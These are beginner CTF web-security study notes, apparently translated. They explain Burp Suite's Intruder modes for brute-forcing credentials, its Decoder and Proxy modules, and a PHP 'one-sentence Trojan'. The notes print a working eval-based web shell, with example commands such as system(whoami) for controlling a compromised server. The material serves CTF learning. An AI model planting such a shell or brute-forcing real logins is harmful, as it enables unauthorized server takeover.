CTF web entry notes
1. Use of BP (burp suit)
1.1 Introduction to the intruder module
1.1.1 positions module
1. Four modes of attck type
(1). Sniper mode
means to crack variables in sequence, if there are multiple variables here, they will be cracked in sequence ( if only one variable needs to be cracked, suitable for selection )
(2) Battering ram mode
It means that the variable is cracked at the same time. If there are multiple variables, it will be cracked at the same time.
(3) Pitchfork mode
Each variable corresponds to a dictionary, and the variable corresponding to each dictionary is used to crack
(4) Cluster bomb mode
corresponds to one variable Dictionary, cross cracking, try different combinations of multiple dictionaries, often used to crack the user name and password without knowing ( but at the same time slower )
1.1.2 Payloads module
Load the dictionary needed for cracking (you can import it from your own file, or you can choose the dictionary that BP comes with)
1.1.3 Options module
Emphasize the "Number of threads" in one. If you want to speed up the cracking speed, you can choose to increase the number of threads, such as changing 5 to 20, but here is not to set the number of threads as large as possible. (Some websites will report errors)
2.1 Introduction to Decoder Module
The encoding and decoding conversion module in BP, if there is something that needs to be encoded and decoded in BP, you can select it, right-click, and then send it to the Decoder module for operation (password)
3.1 proxy module
The proxy module is the core function of burpsuit, which is equivalent to the role of the middleman between the client and the server, which can intercept, view, and modify data packets
3.1.1 intercept module:
You can view and modify the content of the http data package. Data packets can be sent to other modules.
3.1.2 httphistory module:
View all data flows and details passing through the proxy server.
3.1.3 WebSockets history module:
Mainly used to record data packets of WebSockets
3.1.4 options module:
Some settings for proxy services, such as: proxy monitoring port, request packet interception rules, etc.
2. One-sentence Trojan introduction
2.1 What is a one-sentence Trojan
In a word, the Trojan horse is an executable script file. Upload the script file to the target server, and then the file is parsed and executed to achieve the purpose of controlling the target server.
2.2 Three conditions must be met to upload a Trojan horse successfully
- The Trojan can be successfully uploaded to the server.
- We know the path where the Trojan is uploaded to the server.
- The uploaded Trojan can be parsed and executed.
2.3 phpinfo()
As a sentence commonly used by Trojan horses, explain phpinfo(). This stuff includes some current PHP compilation options, environment variables, version, server information, etc. ( in fact, some PHP configurations ). If these are viewed by others It will lead to information leakage.
2.4 Principle
A piece of PHP code
<?php
@eval($_POST['cmd']);
>
After passing the code into the web page, use the POST parameter in the plug-in Hackbar to change the passed function to achieve the goal. For example, in Hackbar, order "cmd=phpinfo();" to view the PHP configuration. Command "cmd=system(whoami);" is to view the user name of its own authority.
As for how to prostitute Hackbar, Baidu can solve this problem sharply ( hehehe , manual funny)